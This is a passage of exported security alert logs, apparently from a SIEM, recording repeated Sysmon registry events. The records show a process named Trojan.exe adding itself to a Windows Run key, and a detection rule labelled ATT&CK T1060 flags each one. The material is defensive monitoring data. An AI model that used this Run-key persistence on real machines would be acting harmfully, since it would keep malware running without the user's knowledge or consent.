HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:02.478432800Z"",""eventRecordID"":""1448"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:02.455\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:02.455"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:14.599",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:01.408 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:01.410314100Z"",""eventRecordID"":""1446"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:01.408\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:01.408"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:14.271",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:00.393 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:00.400839400Z"",""eventRecordID"":""1444"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:00.393\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:00.393"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:14.193",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:59.363 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:59.366387700Z"",""eventRecordID"":""1442"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:59.363\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:59.363"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:11.460",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:58.346 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:58.348527400Z"",""eventRecordID"":""1440"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:58.346\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:58.346"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:10.458",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:57.330 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:57.342683800Z"",""eventRecordID"":""1439"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:57.330\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:57.330"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:09.442",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:56.314 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:56.316381300Z"",""eventRecordID"":""1438"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:56.314\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:56.314"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:08.411",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:55.283 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:55.296802000Z"",""eventRecordID"":""1436"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:55.283\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:55.283"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:07.385",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:54.252 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:54.255475600Z"",""eventRecordID"":""1435"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:54.252\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:54.252"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:05.427",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:53.236 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:53.239099000Z"",""eventRecordID"":""1434"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:53.236\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:53.236"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:05.411",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:52.222 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:52.292739300Z"",""eventRecordID"":""1433"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:52.222\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:52.222"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:04.432",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:51.210 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 